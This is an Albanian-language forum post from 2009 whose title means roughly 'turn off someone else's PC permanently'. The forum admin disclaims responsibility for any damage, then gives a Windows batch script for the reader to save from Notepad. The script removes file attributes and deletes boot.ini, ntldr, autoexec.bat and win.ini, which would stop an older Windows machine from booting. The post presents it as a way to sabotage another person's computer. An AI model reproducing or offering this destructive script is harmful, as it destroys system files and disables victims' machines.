MC RzA

Welcome/Mir Se Vini !
 
HomeCalendarFAQSearchMemberlistUsergroupsRegisterLog in

Share | 
 

 Fike nje PC te huaj pergjithmone

Go down 
AuthorMessage
MC RzA
Admin


Posts : 181
Join date : 2009-10-27

PostSubject: Fike nje PC te huaj pergjithmone   Tue Oct 27, 2009 10:49 am

Fillimisht ,unë nuk mbajë përgjegjsi per dëmet që mundë ti shkaktoni ju.

Hapim Notepadin dhe vendosim këtë kod:


Kodi:
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Back to top Go down
View user profile http://mc-rza.forumotion.com
 
Fike nje PC te huaj pergjithmone
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
MC RzA :: Mësime/Tutorials-
Jump to: